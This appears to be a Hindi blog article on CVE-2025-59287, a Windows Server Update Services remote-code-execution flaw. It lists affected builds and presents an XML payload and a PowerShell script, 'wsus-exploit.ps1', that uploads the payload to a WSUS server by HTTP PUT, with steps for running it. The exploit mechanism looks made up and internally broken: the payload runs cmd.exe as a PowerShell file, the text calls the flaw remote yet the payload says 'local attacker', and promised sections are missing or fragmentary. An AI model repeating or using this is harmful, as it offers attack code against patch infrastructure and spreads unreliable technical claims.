
CVE-2025-59287 के लिए तकनीकी विश्लेषण और प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Windows Server Update Services में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से एक गंभीर RCE है, जिसमें प्रभावित बिल्ड और शमन चरण शामिल हैं।
CVE-2025-59287 विंडोज सर्वर अपडेट सर्विसेज (WSUS) में एक गंभीर RCE भेद्यता है, जो अविश्वसनीय डेटा के असुरक्षित डिसीरियलाइज़ेशन के कारण होती है। यह दूरस्थ हमलावरों को बिना प्रमाणीकरण के मनमाना कोड निष्पादित करने की अनुमति देता है। सक्रिय शोषण के कारण तत्काल पैचिंग की सलाह दी जाती है।
CVE‑2025‑59287 – विंडोज सर्वर अपडेट सर्विसेज (WSUS) में एक रिमोट कोड एक्ज़ीक्यूशन खतरा
मार्क मल्लिया द्वारा
माइक्रोसॉफ्ट की विंडोज सर्वर अपडेट सर्विसेज (WSUS) हर माइक्रोसॉफ्ट विंडोज सर्वर प्लेटफॉर्म के लिए पैच प्रबंधन की रीढ़ है। यह माइक्रोसॉफ्ट के अपडेट कैटलॉग से अपडेट प्राप्त करती है, उन्हें सत्यापित करती है, और उन्हें नेटवर्क के सभी सर्वरों पर पुश करती है। CVE‑2025‑59287 के रूप में पहचानी गई भेद्यता WSUS के अंदर एक असुरक्षित डिसीरियलाइज़ेशन रूटीन का शोषण करती है जो एक हमलावर को अपडेट फीड में मनमाना XML सामग्री इंजेक्ट करने की अनुमति देती है। चूंकि WSUS स्रोत पथ या कमांड डेटा के किसी सत्यापन के बिना पेलोड को प्रोसेस करता है, एक हमलावर कोई भी फ़ाइल नाम और पथ प्रदान कर सकता है, जिससे लक्ष्य सर्वर पर पूर्ण रिमोट कोड एक्ज़ीक्यूशन हो सकता है।
यह क्यों महत्वपूर्ण है:
| उत्पाद संस्करण | प्रभावित बिल्ड |
|---|---|
| Windows Server 2012 | 6.2.9200.0 – < 6.2.9200.25728 |
| Windows Server 2012 R2 | 6.3.9600.0 – < 6.3.9600.22826 |
| Windows Server 2016 | 10.0.14393.0 – < 10.0.14393.8524 |
| Windows Server 2019 | 10.0.17763.0 – < 10.0.17763.7922 |
| Windows Server 2022 | 10.0.20348.0 – < 10.0.20348.4297 |
| Windows Server 2025 | 10.0.26100.0 – < 10.0.26100.6905 |
| Windows Server 23H2 | 10.0.25398.0 – < 10.0.25398.1916 |
(यदि आपका वातावरण एक अलग पैच बिल्ड का उपयोग करता है, तो रेंज को तदनुसार समायोजित करें।)
System.Xml.Linq.XElement के साथ डिसीरियलाइज़ करती है।<SourcePath> एलिमेंट में कोई भी मान रख सकता है; यह मान एक निरपेक्ष पथ के रूप में डिस्क पर लिखा जाता है।<Command> टैग के अंदर की सामग्री PowerShell द्वारा निष्पादित की जाती है जब WSUS स्ट्रीम को प्रोसेस करता है, जिससे पूर्ण रिमोट कोड एक्ज़ीक्यूशन मिलता है।नीचे XML पेलोड है जिसे हम एक भेद्य सर्वर पर अपलोड करेंगे।
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
<Metadata>
<Title>WSUS Exploit</Title>
<Description>Injected by local attacker.</Description>
</Metadata>
<SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
<Command><![CDATA[
powershell -NoProfile -ExecutionPolicy Bypass `
-File C:\Windows\System32\cmd.exe
]]></Command>
</UpdateStream>
### एक नमूना PowerShell एक्सप्लॉइट स्क्रिप्ट
निम्नलिखित स्क्रिप्ट XML पेलोड उत्पन्न करेगी, इसे HTTP PUT के माध्यम से आपके WSUS इंस्टेंस पर अपलोड करेगी, और समस्या निवारण के लिए एक लॉग फ़ाइल छोड़ देगी।
# --------------------------------------------------
# File: wsus‑exploit.ps1
# Purpose: Generate malicious UpdateStream.xml,
# upload it to the WSUS server,
# trigger the feed.
# --------------------------------------------------
param (
[string]$TargetUrl = 'http://wsus.example.com/UpdateStream.xml',
[int] $Port = 80,
[string] $XmlFile = '.\payload.xml'
)
function Build-Xml {
param ([string]$file)
$xmlContent = @"
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
<Metadata>
<Title>WSUS exploit</Title>
<Description>Injected by local attacker.</Description>
</Metadata>
<SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
<Command><![CDATA[
powershell -NoProfile -ExecutionPolicy Bypass `
-File C:\Windows\System32\cmd.exe
]]></Command>
</UpdateStream>
"@
Set-Content -Path $file -Value $xmlContent
}
# Build the XML payload
Build-Xml -file $XmlFile
# Upload via HTTP PUT
Invoke-WebRequest -Uri $TargetUrl `
-Method Put `
-InFile $XmlFile `
-OutFile 'upload.log'
Write-Host "Upload complete – WSUS should now process the stream."
winver.exe चलाएं ताकि पुष्टि हो सके कि बिल्ड उपरोक्त रेंज के भीतर आता है।wsus‑exploit.ps1 को उस मशीन पर कॉपी करें जो आपके WSUS इंस्टेंस तक पहुंच सकती है, यदि आप एक अलग पथ या पोर्ट का उपयोग करते हैं तो $TargetUrl संशोधित करें।C:\Windows\System32\cmd.exe प्रत्येक लक्ष्य सर्वर पर दिखाई देती है और इसमें अपेक्षित पेलोड है।यहां प्रदान की गई जानकारी और एक्सप्लॉइट कोड केवल शैक्षिक उद्देश्यों के लिए हैं। कृपया सुनिश्चित करें कि आपके पास अपने स्वयं के WSUS वातावरण के खिलाफ इस परीक्षण को चलाने की अनुमति है, और उत्पादन प्रणालियों में परिवर्तन तैनात करते समय सभी लागू सुरक्षा सर्वोत्तम-अभ्यास दिशानिर्देशों का पालन करें।